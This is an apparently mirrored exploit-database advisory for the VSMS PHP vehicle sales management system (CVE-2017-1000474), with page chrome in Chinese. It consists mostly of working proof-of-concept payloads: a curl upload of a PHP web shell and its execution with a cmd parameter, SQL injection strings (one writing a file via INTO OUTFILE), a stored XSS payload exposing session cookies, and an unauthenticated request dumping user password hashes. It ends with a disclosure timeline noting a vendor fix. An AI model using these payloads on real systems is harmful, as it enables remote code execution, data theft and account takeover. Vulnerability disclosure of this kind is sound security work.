扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 |
# Exploit Title: VSMS Multiple Vulnerabilities # Google Dork: N/A # Date: 16-3-2018 # Exploit Author: Sing # Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typ_redirect # Software Link: https://sourceforge.net/projects/vsms-php/?source=typ_redirect # Version: 07/2017 (possible v1.2) # Tested on: CentOS 6.9 # CVE : CVE-2017-1000474 1 login/vehicles.php: Lack of file type filter enabling attacker to upload PHP scripts that can later be executed POC curl -i -b 'PHPSESSID=58csdp0as3lvqapqjesp67tr05' -F 'submit=submit' -F support_images[]=@./getShell.php http://10.0.0.14/soyket-vsms-php-63b563b/login/vehicles.php The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads.Now, browse to the location and note the file name.In my vase it's 1510529218getShell.php.To execute it do curl http://10.0.0.14/soyket-vsms-php-63b563b/login/uploads/1510529218getShell.php?cmd=id 2 login/profile.php: Found SQLI in the Date of Birth text box. POC Paste the below POC into the birth date text box and update.A mysql version will appear in the Position box 2015-11-30',u_position=@@version,u_type='Employee' WHERE u_email='employee@employee.com';-- - 3 login/Actions.php: Found Stored XSS in manufacturer_name POC curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=create -d 'manufacturer_name=<script>alert(document.cookie)</script>' Now when user's browse to login/model.php page, he/she will see an alert with the session cookie http://10.0.0.14/soyket-vsms-php-63b563b/login/model.php 4 login/Actions.php (Multiple vulnerabilities) POC (SQLI) curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d "username=employee@employee.com' union select 'SQLIIII' into outfile'/tmp/stuff.txt" This SQLI will write SQLIIII to /tmp/stuff.txt. POC (Information Leak curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=listu This gives anonymous user full list of the users table with unsalted MD5 hash passwords. 5. Solution: The author notified of a new version with fixes (possibly v1.3).It can be found at vendor’s home page https://sourceforge.net/projects/vsms-php/?source=typ_redirect Time Line Author was notified of the vulnerabilities on 27-01-2018 Author notified of the new updates on 14-03-2018 Exploit released on 16-03-2018 |
体验盒子
